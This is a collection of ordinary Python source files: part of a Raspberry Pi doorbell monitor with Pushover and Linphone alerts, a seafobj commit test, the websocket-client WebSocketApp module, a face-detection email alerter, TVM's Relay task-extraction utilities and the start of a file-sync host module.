self.manual_mode_startup(normal_manual_flash = True)
else:
self.manual_mode_enabled = False
self.idle_mode_enabled = True
self.idle_mode_startup()
def process_auto_button(self, channel):
self.print_status("Auto Button Pressed on ")
self.triggered = False
self.ringing = False
if self.auto_mode_enabled == False:
self.idle_mode_enabled = False
self.auto_mode_enabled = True
self.manual_mode_enabled = False
self.auto_mode_attempt = True
else:
self.auto_mode_enabled = False
self.idle_mode_enabled = True
self.idle_mode_startup()
def process_door_status_change(self, parsed_json):
if parsed_json['door'] == 'Entry Door':
if parsed_json['new_door_state'] == 1: # If the door is now open
self.entry_door_open = True
self.print_status("Entry Door Opened. Automatic Answer Not Possible on ")
else: # If the door is now closed
self.entry_door_open = False
self.print_status("Entry Door Closed. Automatic Answer Now Possible if in hours on ")
self.update_status()
def heartbeat_ack(self):
#self.print_status('Heartbeat received from Home Manager on ')
self.heartbeat_count = 0
self.no_heartbeat_ack = False
def update_status(self): #Send status to Homebridge Manager
self.status = json.dumps({'service': 'Status Update', 'Idle': self.idle_mode_enabled, 'Automatic': self.auto_mode_enabled, 'Auto Possible': self.auto_possible(), 'Manual': self.manual_mode_enabled,
'Triggered': self.triggered, 'Terminated': self.shutdown, 'Ringing': self.ringing})
self.client.publish("DoorbellStatus", self.status)
def print_status(self, print_message):
today = datetime.now()
print(print_message + today.strftime('%A %d %B %Y @ %H:%M:%S'))
def input_auto_mode_times(self):
self.active_auto_start = int(input("Enter the 'Auto Answer Start Hour' in 24 hour format: "))
self.active_auto_finish = int(input("Enter the 'Auto Answer Finish Hour' in 24 hour format: "))
weekday_only = input("Disable Auto Mode on weekends? (y/n): ")
if weekday_only == "y":
self.disable_weekend = True
else:
self.disable_weekend = False
def idle_mode_startup(self):
self.flash_leds.manual_led_on_count = 1 # Short LED Flash
self.flash_leds.auto_led_on_count = 1 # Short LED Flash
self.flash_leds.led_counter = 0
self.idle_mode_enabled = True
if self.linphone_in_manual_mode == True and self.linphone_active == True:
self.stop_linphone()
self.print_status("Doorbell Monitor Idle on ")
self.update_status()
def auto_mode_startup(self):
self.flash_leds.manual_led_on_count = 0 # LED Off
if self.triggered == False:
self.flash_leds.auto_led_on_count = 20 # LED On
else:
self.flash_leds.auto_led_on_count = 10 # 50% LED Flash
self.flash_leds.led_counter = 0
self.print_status("Doorbell Monitor Auto Answer on ")
if self.linphone_in_manual_mode == True and self.linphone_active == True:
self.stop_linphone()
self.update_status()
def manual_mode_startup(self, normal_manual_flash):
if self.triggered == False:
self.flash_leds.manual_led_on_count = 20 # LED On to show that Manual Mode has been set up and has not been triggered
else:
self.flash_leds.manual_led_on_count = 10 # 50% LED Flash if the doorbell has been triggered
if normal_manual_flash == True: # Manual Mode has been invoked through setting manual mode (rather than because the hours are outside auto being possible)
self.flash_leds.auto_led_on_count = 0 # LED Off
else: # Manual Mode has been invoked in out of hours auto mode
self.flash_leds.auto_led_on_count = 1 # Short LED Flash to indicate that it's in manual mode because the time is outside auto being possible
self.flash_leds.led_counter = 0
self.print_status("Doorbell Monitor Manual Answer on ")
if self.linphone_in_manual_mode == True:
self.start_linphone()
self.update_status()
def idle_mode(self):
if GPIO.input(self.door_bell_not_ringing) == False and self.disable_doorbell_ring_sensor == False: #if the doorbell is rung and not disabled
self.print_status("Someone rang the bell on ")
self.ringing = True
print("Updating Ring Status True")
self.update_status()
self.ringing = False
time.sleep(2.5)
self.capture_video()
self.push_picture = True # Attach a picture
self.send_pushover_message(self.pushover_token, self.pushover_user, "Doorbell is ringing while in idle mode", "magic")
self.update_status()
def auto_mode(self):
if GPIO.input(self.door_bell_not_ringing) == False and self.disable_doorbell_ring_sensor == False: #if the doorbell is rung and not disabled
self.flash_leds.manual_led_on_count = 0 # LED Off
self.flash_leds.auto_led_on_count = 10 # 50% LED Flash
self.flash_leds.led_counter = 0
self.print_status("Someone rang the bell while in auto mode on ")
self.triggered = True
self.ringing = True
self.update_status()
self.ringing = False
time.sleep(2.5)
self.capture_video() # Capture picture before door opens
self.play_message()
self.push_picture = True # Tells Pushover to send a picture
self.open_and_close_door()
self.send_pushover_message(self.pushover_token, self.pushover_user, "Doorbell is ringing while in auto mode", "updown")
self.capture_video() # Capture picture after door opens
self.send_pushover_message(self.pushover_token, self.pushover_user, "Second Auto Mode picture capture", "magic")
self.update_status()
def manual_mode(self):
if GPIO.input(self.door_bell_not_ringing) == False and self.disable_doorbell_ring_sensor == False: #if the doorbell is rung and not disabled
self.flash_leds.manual_led_on_count = 10 # 50% LED Flash
self.flash_leds.led_counter = 0
self.print_status("Someone rang the bell while in manual mode on ")
self.triggered = True
self.ringing = True
self.update_status()
self.ringing = False
time.sleep(2.5)
self.capture_video()
if self.linphone_in_manual_mode == True:
print("Calling Linphone")
subprocess.call(['linphonecsh dial ' + self.manual_mode_call_sip_address], shell=True)
time.sleep(30)
print("Terminating Linphone call")
subprocess.call(["linphonecsh generic 'terminate'"], shell=True) # Terminate linphone call
if self.pushover_in_manual_mode == True:
print("Sending Pushover Message")
self.push_picture = True # Attach a picture
self.send_pushover_message(self.pushover_token, self.pushover_user, "Doorbell rang while in manual mode", "bugle")
self.update_status()
def play_message(self):
print("Playing message")
subprocess.call(['aplay -D front:CARD=Device,DEV=0 ' + self.auto_message_file], shell=True)
def send_pushover_message(self, token, user, pushed_message, alert_sound):
conn = http.client.HTTPSConnection("api.pushover.net:443")
if self.push_picture == False: # No picture is to be pushed
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": token,
"user": user,
"html": "1",
"title": "Doorbell",
"message": pushed_message,
"sound": alert_sound,
}), { "Content-type": "application/x-www-form-urlencoded" })
else: # Picture is to be pushed
r = requests.post("https://api.pushover.net/1/messages.json", data = {
"token": token,
"user": user,
"title": "Doorbell",
"message": pushed_message,
"sound": alert_sound
},
files = {
"attachment": ("image.jpg", open(self.picture_file_name, "rb"), "image/jpeg")
})
def open_and_close_door(self):
self.disable_doorbell_ring_sensor = True # To avoid triggering doorbell ring sensor when door is opened and closed
GPIO.output(self.open_door, True)
self.print_status("Door unlocked on ")
time.sleep(3)
GPIO.output(self.open_door, False)
self.print_status("Door locked on ")
self.disable_doorbell_ring_sensor = False # Reactivate doorbell ring sensor
def capture_video(self):
today = datetime.now()
time_stamp = today.strftime('%d%B%Y%H%M%S')
self.picture_file_name = self.auto_video_capture_directory + time_stamp + "picturedump.jpg"
print("Capturing picture in file " + self.picture_file_name)
subprocess.call(["fswebcam " + self.picture_file_name], shell=True)
def auto_possible(self):
today = datetime.now()
hour = int(today.strftime('%H'))
day = today.strftime('%A')
if day == "Saturday" or day == "Sunday":
weekday = False
else:
weekday = True
if self.disable_weekend == True and weekday == False:
active_day = False
else:
active_day = True
if hour >= self.active_auto_start and hour < self.active_auto_finish and active_day == True and self.entry_door_open == False:
return True
else:
return False
def start_linphone(self):
print('Starting Linphone')
self.linphone_active = True
subprocess.call(['linphonecsh init -' + self.linphone_video_parameter + ' -d 1 -l ' + self.linphone_debug_log_file +
" -c " + self.linphone_config_file], shell=True)
def stop_linphone(self):
print('Stopping Linphone')
self.linphone_active = False
subprocess.call(['linphonecsh exit'], shell=True)
def shutdown_cleanup(self):
# Shutdown LED flashing thread
self.flash_leds.flash_leds = False
self.flash_leds.terminate()
GPIO.cleanup()
if self.linphone_in_manual_mode == True:
self.stop_linphone()
time.sleep(1)
self.today = datetime.now()
self.print_status("Doorbell Monitor Stopped on ")
self.idle_mode_enabled = False
self.manual_mode_enabled = False
self.auto_mode_enabled = False
self.triggered = False
self.ringing = False
self.shutdown = True
self.update_status()
self.client.loop_stop() # Stop mqtt monitoring thread
def process_home_manager_heartbeat(self):
if self.heartbeat_enabled == True:
self.heartbeat_count +=1
if self.heartbeat_count == 3000:
#self.print_status('Sending Heartbeat to Home Manager on ')
self.send_heartbeat_to_home_manager()
if self.heartbeat_count > 4500:
self.print_status('Home Manager Heartbeat Lost. Restarting code on ')
self.no_heartbeat_ack = True
self.shutdown_cleanup()
time.sleep(10)
self.restart_code()
def send_heartbeat_to_home_manager(self):
self.client.publish('DoorbellStatus', '{"service": "Heartbeat"}')
def restart_code(self):
self.client.publish('DoorbellStatus', '{"service": "Restart"}')
self.shutdown_cleanup()
os.system('sudo reboot')
def run(self):
self.led_cycle_duration = 0.05
self.led_cycle_count = 20
self.flash_leds = TwoLedFlash(self.led_cycle_duration, self.led_cycle_count)
self.flash_leds_thread = Thread(target=self.flash_leds.run)
self.flash_leds_thread.start()
self.print_status("Northcliff Doorbell Monitor Started on ")
if self.linphone_in_manual_mode == True:
self.start_linphone()
time.sleep(5)
print("Linphone Test Call on Startup")
subprocess.call(['linphonecsh dial ' + self.manual_mode_call_sip_address], shell=True)
time.sleep(25)
print("Terminating Linphone Test Call")
subprocess.call(["linphonecsh generic 'terminate'"], shell=True) # Terminate linphone call
self.stop_linphone()
else:
self.capture_video() # Capture picture on startup
if self.ask_for_auto_time_input == True:
self.input_auto_mode_times()
if self.disable_weekend == True:
print ("Active Auto Mode Start at " + str(self.active_auto_start) + ":00 Hours, Active Auto Mode Finish at " + str(self.active_auto_finish)
+ ":00 Hours, Auto Mode Disabled on Weekends")
else:
print ("Active Auto Mode Start at " + str(self.active_auto_start) + ":00 Hours, Active Auto Mode Finish at " + str(self.active_auto_finish)
+ ":00 Hours, Auto Mode Enabled on Weekends")
self.previous_auto_possible = True
self.idle_mode_startup()
self.auto_mode_attempt = False
if self.auto_on_startup == True:
self.process_auto_button(self.auto_button)
self.auto_mode_startup()
try:
while True: # Run Doorbell Monitor in continuous loop
self.current_auto_possible = self.auto_possible()
if self.auto_mode_enabled == True and self.current_auto_possible == True:
if self.previous_auto_possible == False or self.auto_mode_attempt == True:
self.auto_mode_attempt = False
self.auto_mode_startup()
self.auto_mode()
elif self.auto_mode_enabled == True and self.current_auto_possible == False:
if self.previous_auto_possible == True or self.auto_mode_attempt == True:
self.auto_mode_attempt = False
self.manual_mode_startup(normal_manual_flash = False) # Change LED Flashing in manual_mode_startup to indicate that auto has been disabled due to out of hours or door opening
self.manual_mode()
elif self.manual_mode_enabled == True:
self.manual_mode()
else:
self.idle_mode()
self.previous_auto_possible = self.current_auto_possible
self.process_home_manager_heartbeat()
time.sleep(0.1)
except KeyboardInterrupt: # Shutdown on ctrl C
# Shutdown main program
self.shutdown_cleanup()
if __name__ == '__main__': # This is where to overall code kicks off
monitor = NorthcliffDoorbellMonitor(pushover_in_manual_mode = True, full_video = False, ask_for_auto_time_input = False, active_auto_start = 7,
active_auto_finish = 19, disable_weekend = True, manual_mode_call_sip_address = "<Your SIP Address Here>",
pushover_token = "<Your Pushover Token Here>", pushover_user = "<Your Pushover User Here>",
linphone_debug_log_file = "<Your linphone debug log file location here>", auto_message_file = "<Your auto message file location here>",
auto_video_capture_directory = "<Your video capture directory location here>", linphone_config_file = "<Your linphone config file location here>",
auto_on_startup = True, linphone_in_manual_mode = True, heartbeat_enabled = True)
monitor.run()
|
test_commits.py
|
import threading
from ..base import BaseTest
from seafobj import commit_mgr
from seafobj.commits import SeafCommit
Success = True
class TestSeafCommitManager(BaseTest):
def setUp(self):
self.repo_id = self.TEST_CEPH_REPO_ID
self.repo_id_2 = self.TEST_CEPH_REPO_ID_2
self.head_commit = self.TEST_CEPH_HEAD_COMMIT
self.last_commit = self.TEST_CEPH_ADD_COMMIT
def load_commits(self):
seafcmt = commit_mgr.load_commit(self.repo_id, 1, self.head_commit)
self.assertTrue(isinstance(seafcmt, SeafCommit))
self.assertEqual('Renamed directory "create_renamed_folder"', seafcmt.description)
self.assertEqual('ffc32568c059e9532cb426f19f8138c624c5cdd4', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211913, seafcmt.ctime)
seafcmt = commit_mgr.load_commit(self.repo_id, 1, self.last_commit)
self.assertEqual('Modified "added_folder.md"', seafcmt.description)
self.assertEqual('9e4705d102d86756eb8ed9d8d16922ee3212c7c5', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211712, seafcmt.ctime)
def load_commits_2(self):
seafcmt = commit_mgr.load_commit(self.repo_id_2, 1, self.head_commit)
self.assertTrue(isinstance(seafcmt, SeafCommit))
self.assertEqual('Renamed directory "create_renamed_folder"', seafcmt.description)
self.assertEqual('ffc32568c059e9532cb426f19f8138c624c5cdd4', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211913, seafcmt.ctime)
seafcmt = commit_mgr.load_commit(self.repo_id_2, 1, self.last_commit)
self.assertEqual('Modified "added_folder.md"', seafcmt.description)
self.assertEqual('9e4705d102d86756eb8ed9d8d16922ee3212c7c5', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211712, seafcmt.ctime)
def test_load_commit(self):
test_multi = True
try:
obj_stores = commit_mgr.obj_stores
except AttributeError:
test_multi = False
if test_multi:
for i in range(100):
self.load_commits()
self.load_commits_2()
else:
for i in range(100):
self.load_commits()
def catch_with_commits(self):
try:
self.test_load_commit()
except AssertionError:
global Success
Success = False
#raise e
except Exception as e:
raise e
def test_load_commit_with_multi_thread(self):
ths = []
for i in range(20):
th = threading.Thread(target=self.catch_with_commits)
ths.append(th)
th.start()
for th in ths:
th.join()
self.assertTrue(Success)
|
_app.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import inspect
import select
import sys
import threading
import time
import traceback
import six
from ._abnf import ABNF
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from . import _logging
__all__ = ["WebSocketApp"]
class Dispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r, w, e = select.select(
(self.app.sock.sock, ), (), (), self.ping_timeout)
if r:
if not read_callback():
break
check_callback()
class SSLDispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r = self.select()
if r:
if not read_callback():
break
check_callback()
def select(self):
sock = self.app.sock.sock
if sock.pending():
return [sock,]
r, w, e = select.select((sock, ), (), (), self.ping_timeout)
return r
class WebSocketApp(object):
"""
Higher level of APIs are provided.
The interface is like JavaScript WebSocket object.
"""
def __init__(self, url, header=None,
on_open=None, on_message=None, on_error=None,
on_close=None, on_ping=None, on_pong=None,
on_cont_message=None,
keep_running=True, get_mask_key=None, cookie=None,
subprotocols=None,
on_data=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The argument is this class object.
on_message: callable object which is called when received data.
on_message has 2 arguments.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
on_error: callable object which is called when we get error.
on_error has 2 arguments.
The 1st argument is this class object.
The 2nd argument is exception object.
on_close: callable object which is called when closed the connection.
this function has one argument. The argument is this class object.
on_cont_message: callback object which is called when receive continued
frame data.
on_cont_message has 3 arguments.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
The 3rd argument is continue flag. if 0, the data continue
to next frame data
on_data: callback object which is called when a message received.
This is called before on_message or on_cont_message,
and then on_message or on_cont_message is called.
on_data has 4 argument.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
The 3rd argument is data type. ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY will be came.
The 4th argument is continue flag. if 0, the data continue
keep_running: this parameter is obsolete and ignored.
get_mask_key: a callable to produce new mask keys,
see the WebSocket.set_mask_key's docstring for more information
subprotocols: array of available sub protocols. default is None.
"""
self.url = url
self.header = header if header is not None else []
self.cookie = cookie
self.on_open = on_open
self.on_message = on_message
self.on_data = on_data
self.on_error = on_error
self.on_close = on_close
self.on_ping = on_ping
self.on_pong = on_pong
self.on_cont_message = on_cont_message
self.keep_running = False
self.get_mask_key = get_mask_key
self.sock = None
self.last_ping_tm = 0
self.last_pong_tm = 0
self.subprotocols = subprotocols
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if not self.sock or self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException(
"Connection is already closed.")
def close(self, **kwargs):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock:
self.sock.close(**kwargs)
self.sock = None
def _send_ping(self, interval, event):
while not event.wait(interval):
self.last_ping_tm = time.time()
if self.sock:
try:
self.sock.ping()
except Exception as ex:
_logging.warning("send_ping routine terminated: {}".format(ex))
break
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None, dispatcher=None,
suppress_origin=False, proxy_type=None):
"""
run event loop for WebSocket framework.
This loop is infinite loop and is alive during websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple
and each element is argument of sock.setsockopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send "ping" command
every specified period(second)
if set to 0, not send automatically.
ping_timeout: timeout(second) if the pong message is not received.
http_proxy_host: http proxy host name.
http_proxy_port: http proxy port. If not set, set to 80.
http_no_proxy: host names, which doesn't use proxy.
skip_utf8_validation: skip utf8 validation.
host: update host header.
origin: update origin header.
dispatcher: customize reading data from socket.
suppress_origin: suppress outputting origin header.
Returns
-------
False if caught KeyboardInterrupt
True if other exception was raised during a loop
"""
if ping_timeout is not None and ping_timeout <= 0:
ping_timeout = None
if ping_timeout and ping_interval and ping_interval <= ping_timeout:
raise WebSocketException("Ensure ping_interval > ping_timeout")
if not sockopt:
sockopt = []
if not sslopt:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
self.keep_running = True
self.last_ping_tm = 0
self.last_pong_tm = 0
def teardown(close_frame=None):
"""
Tears down the connection.
If close_frame is set, we will invoke the on_close handler with the
statusCode and reason from there.
"""
if thread and thread.isAlive():
event.set()
thread.join()
self.keep_running = False
if self.sock:
self.sock.close()
close_args = self._get_close_args(
close_frame.data if close_frame else None)
self._callback(self.on_close, *close_args)
self.sock = None
try:
self.sock = WebSocket(
self.get_mask_key, sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message is not None,
skip_utf8_validation=skip_utf8_validation,
enable_multithread=True if ping_interval else False)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(
self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port, http_no_proxy=http_no_proxy,
http_proxy_auth=http_proxy_auth, subprotocols=self.subprotocols,
host=host, origin=origin, suppress_origin=suppress_origin,
proxy_type=proxy_type)
if not dispatcher:
dispatcher = self.create_dispatcher(ping_timeout)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(
target=self._send_ping, args=(ping_interval, event))
thread.setDaemon(True)
thread.start()
def read():
if not self.keep_running:
return teardown()
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
return teardown(frame)
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG:
self.last_pong_tm = time.time()
self._callback(self.on_pong, frame.data)
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_data, frame.data,
frame.opcode, frame.fin)
self._callback(self.on_cont_message,
frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and op_code == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_data, data, frame.opcode, True)
self._callback(self.on_message, data)
return True
def check():
if (ping_timeout):
has_timeout_expired = time.time() - self.last_ping_tm > ping_timeout
has_pong_not_arrived_after_last_ping = self.last_pong_tm - self.last_ping_tm < 0
has_pong_arrived_too_late = self.last_pong_tm - self.last_ping_tm > ping_timeout
if (self.last_ping_tm
and has_timeout_expired
and (has_pong_not_arrived_after_last_ping or has_pong_arrived_too_late)):
raise WebSocketTimeoutException("ping/pong timed out")
return True
dispatcher.read(self.sock.sock, read, check)
except (Exception, KeyboardInterrupt, SystemExit) as e:
self._callback(self.on_error, e)
if isinstance(e, SystemExit):
# propagate SystemExit further
raise
teardown()
return not isinstance(e, KeyboardInterrupt)
def create_dispatcher(self, ping_timeout):
timeout = ping_timeout or 10
if self.sock.is_ssl():
return SSLDispatcher(self, timeout)
return Dispatcher(self, timeout)
def _get_close_args(self, data):
""" this functions extracts the code, reason from the close body
if they exists, and if the self.on_close except three arguments """
# if the on_close callback is "old", just return empty list
if sys.version_info < (3, 0):
if not self.on_close or len(inspect.getargspec(self.on_close).args) != 3:
return []
else:
if not self.on_close or len(inspect.getfullargspec(self.on_close).args) != 3:
return []
if data and len(data) >= 2:
code = 256 * six.byte2int(data[0:1]) + six.byte2int(data[1:2])
reason = data[2:].decode('utf-8')
return [code, reason]
return [None, None]
def _callback(self, callback, *args):
if callback:
try:
if inspect.ismethod(callback):
paramlen = len(inspect.signature(callback).parameters)
if paramlen == len(args) + 1:
callback(self, *args)
else:
callback(*args)
else:
callback(self, *args)
except Exception as e:
_logging.error("error from callback {}: {}".format(callback, e))
if _logging.isEnabledForDebug():
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
|
alert_system.py
|
import requests
import logging
import datetime
from threading import Thread
import uuid
import cv2
import smtplib
from os.path import basename
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
import glob
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class AlertSystem():
def __init__(self, log_system, **kwargs):
self.email_user = kwargs.get("email_user")
self.email_passwd = kwargs.get("email_passwd")
self.email_from = kwargs.get("email_from")
self.email_to = kwargs.get("email_to")
self.log_system = log_system
self.camera_id = ""
self.timestamp = ""
self.last_alert = None
self.total_alerts = 0
def __send_email(self):
logger.info("Sending email to %s", self.email_to)
text = "Unidentified face detected at {}, on camera ID {}".format(self.timestamp, self.camera_id)
subject = '[Observer] Alert Triggered'
msg = MIMEMultipart()
msg['From'] = self.email_from
msg['To'] = self.email_to
msg['Date'] = self.timestamp
msg['Subject'] = subject
msg.attach(MIMEText(text))
# set attachments
files = glob.glob("/tmp/observer_*")
logger.info("Number of images attached to email: %s", len(files))
for f in files:
with open(f, "rb") as fil:
part = MIMEApplication(
fil.read(),
Name=basename(f)
)
part['Content-Disposition'] = 'attachment; filename="%s"' % basename(f)
msg.attach(part)
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
try:
server.login(self.email_user, self.email_passwd)
except smtplib.SMTPAuthenticationError:
logger.error("Bad Username or Password when trying to authenticate to email server.")
except:
logger.error("Unknow error on login.")
else:
server.sendmail(self.email_from, self.email_to, msg.as_string())
finally:
server.quit()
def alert(self, image):
self.__send_email()
file_name = self.save_image_to_disk(image)
self.log_system.create_log(self.camera_id, file_name)
def save_image_to_disk(self, image):
file_name = 'image_alerts/' + str(uuid.uuid4()) + '.jpg'
cv2.imwrite('observer/obmng/static/' + file_name, image)
return file_name
def send_alert(self, camera_id, image):
self.camera_id = camera_id
self.timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
limit = 3
if not self.last_alert:
self.last_alert = datetime.datetime.now()
time_diff = (datetime.datetime.now() - self.last_alert).seconds
if time_diff > limit:
if self.total_alerts > limit:
Thread(target=self.alert, args=(image, )).start()
print("Sending alerts")
print("Zeroing")
self.total_alerts = 0
self.last_alert = None
else:
print("Not enough time")
self.total_alerts += 1
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name, not-context-manager
"""
Decorator and utilities for the integration with TOPI and Relay
99.9% copy-paste of implementation by @MerryMercy
"""
import threading
import logging
import warnings
import tvm
from tvm.autotvm.task.dispatcher import DispatchContext, FallbackContext
from tvm.target import Target
from .task import create
from .topi_integration import TaskExtractEnv
logger = logging.getLogger("autotvm")
# TODO(moreau89) find a more elegant way to lower for VTAs
def _lower(mod, target, params):
"""Helper to lower VTA properly."""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_executor_codegen
if hasattr(target, "device_name") and target.device_name == "vta":
import vta
with vta.build_config(opt_level=3, disabled_pass={"AlterOpLayout"}):
mod, _ = relay.optimize(mod, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(mod["main"])
return
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod, target=target)
def extract_from_program(mod, params, target, target_host=None, ops=None):
"""Extract tuning tasks from a relay program.
This function is the single program version of extract_from_multiple_program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
if target_host is not None:
warnings.warn(
"target_host parameter is going to be deprecated. "
"Please pass in tvm.target.Target(target, host=target_host) instead."
)
target, target_host = Target.check_and_update_host_consist(target, target_host)
return extract_from_multiple_program([mod], [params], target, ops=ops)
def extract_from_multiple_program(mods, params, target, target_host=None, ops=None):
"""Extract tuning tasks from multiple relay programs.
This function collects tuning tasks by building a list of programs
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
mods: List[tvm.IRModule] or List[relay.function.Function]
The list of modules or functions to tune
params: List of dict of str to numpy array
The associated parameters of the programs
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm import topi
env = TaskExtractEnv.get()
# merge target and target host
target, target_host = Target.check_and_update_host_consist(target, target_host)
# run compiler to collect all TOPI calls during compilation
env.reset(ops)
with env:
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
for mod, param in zip(mods, params):
if isinstance(mod, relay.function.Function):
mod = tvm.IRModule.from_expr(mod)
assert isinstance(
mod, tvm.IRModule
), "only support relay Module or Function to be tuned"
relay.backend.te_compiler.get().clear()
# wrap build call in thread to avoid multiprocessing problems
build_thread = threading.Thread(target=_lower, args=(mod, target, param))
build_thread.start()
build_thread.join()
relay.backend.te_compiler.get().clear()
# Clear the warning message cache in FallbackContext
if isinstance(DispatchContext.current, FallbackContext):
DispatchContext.current.memory = {}
DispatchContext.warning_messages = set()
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
try:
tsk = create(task_name, args, target=target)
tasks.append(tsk)
except topi.InvalidShapeError:
logger.warning("Invalid shape during AutoTVM task creation")
return tasks
|
host.py
|
import abc
import os
import pathlib
import asyncssh
import asyncio
import getpass
import stat
import time
import logging
import posixpath
from io import BytesIO
from datetime import datetime
from aiofile import async_open
from queue import Queue, Empty
from threading import Thread
from fnmatch import fnmatchcase
log = logging.getLogger('iris')
IGNORED_PATTERNS = ('*.swpx', '*.md5', '.swp', '.swx', '.DS_Store', '~')
def enhance_pattern(pattern):
if pattern.endswith('/'): # Automatically append an * if a directory is specified
pattern = pattern + '*'
return pattern
def run(tasks):
if not isinstance(tasks, list):
tasks = [tasks]
loop = asyncio.get_event_loop()
res = loop.run_until_complete(asyncio.gather(*tasks))[0]
return res
class File:
def __init__(self, path, time, path_holder, change_type=None):
self.path = path
self.holder = path_holder
self.time = self.set_time(time) if time is not None else None
self.change_type = change_type
def set_time(self, time):
if isinstance(time, datetime):
return time
else:
if isinstance(time, str):
return datetime.fromtimestamp(int(float(time)))
else:
return datetime.fromtimestamp(int(time))
def fetch_time(self):
return self.holder.get_time(self.path)
def get_content(self):
return self.holder.get_content(self.path)
@property
def short_path(self):
return self.path.split(self.holder.path)[-1].split('/', 1)[-1]
def __repr__(self, short=True):
try:
return f'Path: {self.path} - {self.time.ctime()} - {self.time.timestamp()}'
except AttributeError:
return f'Path: {self.path}'
class Path:
def __init__(self, path, dry=False, pattern='*', ignore_pattern='//', *args, **kwargs):
self.path = path
self.host = None
self.dry = dry
self.pattern = pattern
self.ignore_pattern = ignore_pattern
self.wd = None
self.tasks = None
def has_pattern(self, p, path):
return any([fnmatchcase(p.split(path)[1], enhance_pattern(pat)) for pat in self.pattern.split()])
def has_ignore(self, p, path):
return any([fnmatchcase(p.split(path)[1], enhance_pattern(pat)) for pat in self.ignore_pattern.split()])
def __repr__(self):
return f'Host {self.host}:{self.path}'
def relative_path(self, path):
path = os.path.abspath(path)
